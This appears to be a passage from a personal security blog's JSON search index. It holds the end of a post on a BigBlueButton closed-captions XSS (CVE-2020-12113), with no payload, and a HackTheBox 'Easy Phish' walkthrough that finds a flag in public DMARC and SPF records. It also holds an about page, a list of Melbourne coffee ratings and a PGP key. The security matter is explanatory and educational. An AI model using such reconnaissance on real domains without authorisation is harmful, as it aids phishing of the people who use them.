and all users with captions enabled can see them at the bottom of the screen. While the ability to add captions is only restricted to moderator level permissions, this issue is exaggerated, as when the breakout room functionality is used, all users are granted moderator level permissions, allowing them to write captions.","title":"CVE-2020-12113 BigBlueButton | Closed Captions XSS"},{"content":"Easy Phish is an Open Source Intelligence (OSINT) challenge on hackthebox.eu, which provides the challenge flag through publicity available information. This walk-through will be providing step by step instructions on how that flag can be obtained.\nCustomers of secure-startup.com have been receiving some very convincing phishing emails, can you figure out why?\nWith the challenge brief above, three main points can be identified:\nThe scope of the target is secure-startup.com domain and/or other related entities. The issue is related to emails. The type of attack at hand is phishing attack. With the points above, one of the first steps is to google how email phishing can be prevented on a domain. Search term \u0026lsquo;prevent phishing domain\u0026rsquo;.\nAfter clicking on the first link, Microsoft suggests implementing Domain Message Authentication, Reporting, and Conformance (DMARC) and mentions other related technologies such as Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). Great, we now have some records which we can look up against the domain to see if they have been implemented properly.\nAfter googling \u0026lsquo;DMARC record lookup\u0026rsquo; I came across dmarcanalyzer.com which gave the following information:\nWith the information above, we can identify two valid tags, however there is an unknown tag that possibly looks like second half of a flag due to \u0026lsquo;}\u0026rsquo; ending, we will store this for now in our notes. With no other information left to extract from DMARC results, we will now do a SPF record check and see what information may be available to use there.\nUsing similar google terms as DMARC, we will google \u0026lsquo;SPF record lookup\u0026rsquo;, which gives various tools, such as mxtoolbox.com, which gives the following output:\nWith the output above, we now have the first part of the flag, which if we combine with the second part in DMARC record, gives us the complete flag of:\nThis challenge encourages the users to look at publicly available information for intelligence gathering, in order to determine where a fault may lie in a system. This information can be used by the blue team to secure a system or by red team to try breach a system.\n","permalink":"/blog/easy-phish-hackthebox/","summary":"Easy Phish is an Open Source Intelligence (OSINT) challenge on hackthebox.eu, which provides the challenge flag through publicity available information. This walk-through will be providing step by step instructions on how that flag can be obtained.\nCustomers of secure-startup.com have been receiving some very convincing phishing emails, can you figure out why?\nWith the challenge brief above, three main points can be identified:\nThe scope of the target is secure-startup.com domain and/or other related entities.","title":"Easy Phish - HackTheBox"},{"content":"I am an energetic person who has developed a mature and responsible approach to any task I undertake. I take pride in my attention to detail and ability to effectively maintain my time. I have a clear and logical approach to problem solving and a drive to see things through to completion.\nMy work involves responding to security incidents and events, as well as, engineering automation and tooling for security response. I also dabble in threat hunting, malware analysis and digital forensics. Outside of that, you can find me trawling the Internet for \u0026lsquo;interesting\u0026rsquo; findings or testing new tools and technology.\nIf you would like to get in touch, I can be contacted on me(at)sakshamanand.com. My PGP key is available here.\n","permalink":"/about/","summary":"I am an energetic person who has developed a mature and responsible approach to any task I undertake. I take pride in my attention to detail and ability to effectively maintain my time. I have a clear and logical approach to problem solving and a drive to see things through to completion.\nMy work involves responding to security incidents and events, as well as, engineering automation and tooling for security response.","title":"About Me"},{"content":" Tier Coffee Shop S Patricia Rosso Warkop A Manchester Press Pellegrini's Code Black Brother Baba Budan Market Lane Hikari Sargon Cafe Short Stop Morrow ONA in.btwn Regulars Roasting Warehouse OMO OPPEN B Heirloom Seed Dukes Coffee The League of Honest Coffee Axil Romanello Lune Overlay Juniper Cafe OKO Cafe Proud Mary INI Coffee Maker Four7Six Yilufa Coffee Co Moment Coffee Shelter Cafe Montesanto Coffee Rudimentary Beach Cafe Seaford Mount Macedon Trading Post Red Bean Coffee Roaster El Parche Coffee Roasters Cafe C The Worker's Food Room Commonplace Coffee Federal Coffee Little League Operator25 Kings and Knaves Espresso House Blend Vacation Coffee Traveller Coffee Industry Beans Come Back to Earth Coffee Bench Coffee Co Upstanding Citizens The Ritz-Carlton Lounge Padre Coffee Zuppa Brioche by Philip Higher Ground KOI Schmucks Bagels Culpa Espresso Project Zero Brick Lane Krimper Cafe Pie in the Sky Proserpina Bakehouse Otherside Coffe il caffè by Jerry Lee Cafe Court Operator Coffee People's Coffee JollyGood Sloppy Joe's Puzzle Coffee Encanto Amie Bakery Dusty Fox Cafe Beach Shack Elwood Bammi Local Rules Cafe OMI 380 Glass Den Cafe Airflow Coffee House of Fras Miss Maple's Tearoom HER Cafe Calmer Cafe Poyntons Nursery Fairfield Park Boathouse Bowery to Williamsburg WYM Geelong Brother Hen The Meeting Pool Cafe cup\u0026amp;cozy Peck Roads Caps Cafe MAZI Moons Licensed Espresso Bar HAH Lornebeach The Salty Dog Cafe Specialty Coffee Army Southern Society Dark Horse Cafe Tick Tok Too Good Bakers Peregrine Social Club) Benji's in Sassafras Strudel's Cafe D Hangar Cafe The Bond Store Wharf Shed Cafe Oliver's Patisserie \u0026amp; Cafe ","permalink":"/coffee/","summary":" Tier Coffee Shop S Patricia Rosso Warkop A Manchester Press Pellegrini's Code Black Brother Baba Budan Market Lane Hikari Sargon Cafe Short Stop Morrow ONA in.btwn Regulars Roasting Warehouse OMO OPPEN B Heirloom Seed Dukes Coffee The League of Honest Coffee Axil Romanello Lune Overlay Juniper Cafe OKO Cafe Proud Mary INI Coffee Maker Four7Six Yilufa Coffee Co Moment Coffee Shelter Cafe Montesanto Coffee Rudimentary Beach Cafe Seaford Mount Macedon Trading Post Red Bean Coffee Roaster El Parche Coffee Roasters Cafe C The Worker's Food Room Commonplace Coffee Federal Coffee Little League Operator25 Kings and Knaves Espresso House Blend Vacation Coffee Traveller Coffee Industry Beans Come Back to Earth Coffee Bench Coffee Co Upstanding Citizens The Ritz-Carlton Lounge Padre Coffee Zuppa Brioche by Philip Higher Ground KOI Schmucks Bagels Culpa Espresso Project Zero Brick Lane Krimper Cafe Pie in the Sky Proserpina Bakehouse Otherside Coffe il caffè by Jerry Lee Cafe Court Operator Coffee People's Coffee JollyGood Sloppy Joe's Puzzle Coffee Encanto Amie Bakery Dusty Fox Cafe Beach Shack Elwood Bammi Local Rules Cafe OMI 380 Glass Den Cafe Airflow Coffee House of Fras Miss Maple's Tearoom HER Cafe Calmer Cafe Poyntons Nursery Fairfield Park Boathouse Bowery to Williamsburg WYM Geelong Brother Hen The Meeting Pool Cafe cup\u0026amp;cozy Peck Roads Caps Cafe MAZI Moons Licensed Espresso Bar HAH Lornebeach The Salty Dog Cafe Specialty Coffee Army Southern Society Dark Horse Cafe Tick Tok Too Good Bakers Peregrine Social Club) Benji's in Sassafras Strudel's Cafe D Hangar Cafe The Bond Store Wharf Shed Cafe Oliver's Patisserie \u0026amp; Cafe ","title":"Melbourne Coffee Ratings"},{"content":"-----BEGIN PGP PUBLIC KEY BLOCK----- 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 rh0= =TLSc -----END PGP PUBLIC KEY BLOCK----- ","permalink":"/public_key/","summary":"-----BEGIN PGP PUBLIC KEY BLOCK----- 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 rh0= =TLSc -----END PGP PUBLIC KEY BLOCK----- ","title":"PGP Key"}]